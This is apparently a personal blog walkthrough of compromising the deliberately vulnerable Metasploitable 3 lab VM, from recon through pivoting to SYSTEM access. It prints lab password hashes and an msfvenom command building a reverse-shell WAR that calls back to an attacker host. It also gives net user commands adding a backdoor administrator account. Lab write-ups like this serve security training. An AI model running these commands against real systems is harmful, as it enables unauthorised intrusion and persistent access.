Metasploitable 3 Walkthrough - Getting System

It's been a few weeks since metasploitable 3 was released and I've finally found time to write up how I went from a new VM to system level access.

Building the VM
The setup process was reasonably straightforward, if a little time consuming. After installing a couple of the dependencies which I didn't already have, I ran the included 'build_win2008.ps1' script which took care of everything for me. Setup did take a couple of hours so don't expect to get going quickly.

Once the build was completed, I changed the network settings in VirtualBox to add the machine to a nat network with my kali box.

Recon
After running netdiscover to get the target IP, I kicked off an nmap scan.


Bypassing the firewall

With my new shell, I spent some time enumerating the target, looking for ways to escalate privileges. There appeared to be many more applications installed than where visible from my initial NMap scan.

Running ipconfig revealed that the target has another NIC, sat on a different network. To access the new network, I set up a pivot through my meterpreter session.

Route add 172.28.128.3 255.255.255.0 1

I then setup the metasploit socks4 proxy, allowing me to use my web browser/burp to access the new network.

More recon

After setting up proxychains I ran NMap over the new network.


This revealed plenty of new apps to dig into. As before, I took a quick look at each new open port, looking for easy wins and known exploits.

Wordpress

During my recon, I discovered that the mysql instance running on port 3306 allowed root to authenticate without a password.


Using this access, I was able to pull usernames and hashed passwords from the wordpress database.

mysql> select user_login, user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 |
| vagrant    | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ |
| user       | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ |
| manager    | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 |
+------------+------------------------------------+

As this is an intentionally vulnerable target, I was confident that the passwords would be weak. I set John running against the admin hash, which soon found the password.


Running WPScan against the wordpress install on port 8585 revealed a vulnerable version of ninja forms (CVE-2016-1209). Again, there is a metasploit module available for this install.

After fixing the wordpress install (see a later section), I attempted to run the metasploit exploit for the vulnerable plugin. Despite multiple attempts, I was not able to get it to work. The exploit relies on a relative path to a ninja forms page, which I was not able to find. I tried adding a new form through the admin interface, which simply did not work. Defeated, I moved on.

Jenkins

There is a jenkins instance running on port 8484, which can be exploited with exploit/multi/http/jenkins/jenkins_script_console. This is also running as the local service account.



Tomcat

Tomcat is running on port 8484, but requires credentials to access the management interface. As I already had a shell, I was able to retrieve the credentials from the tomcat-users.xml file, located at c:\program files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf.


With access to the manager interface, I was able to upload a WAR file containing a reverse shell, which was created with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.0.10 LPORT=4445 -f war > shell.war


After starting a metasploit handler and executing the uploaded sell, I was rewarded with a shell running as system!


Persistence

To avoid having to chain exploits every time I wanted to access the system, I decided to add my own local administrator level user.

net users hacker hacker /add
net localgroup administrators hacker /add

With my new user, I was able to remote desktop directly to the server.



Final thoughts

I really enjoyed this version of metasploitable, being forced to use pivots and attack multiple services to gain system felt more 'real world' than simply firing off an exploit and getting root. This version was only a couple of days old when I started, and there where some bugs present. The most noticeable of which was the script which populates all the flags simply did not run (which I discovered after many hours spent digging through the file system and resorting to cheating by reading the setup scripts).

BONUS - Flags!

Despite my issues with the setup scripts, I did manage to find two flags while digging through the VM. Both are located within the wordpress install.

When first accessed, the wordpress install has a base URL set, which is not the target URL. As I had root access to the database, i updated the base URL in the wp_options table. I could have set up a rule in burp to fix the issue, but I wanted to fix it permanently.

Once the wordpress base URL problems are resolved, the site will load and display a link to the first flag, the 'king of hearts'


After logging in as the wordpress admin, viewing the site will reveal a hidden post, containing the 'king of diamonds'.


After tweeting an image of the king of hearts, one of the rapid7 devs announced that I had found the first ever metasploitable3 flag, which was an unexpected honor!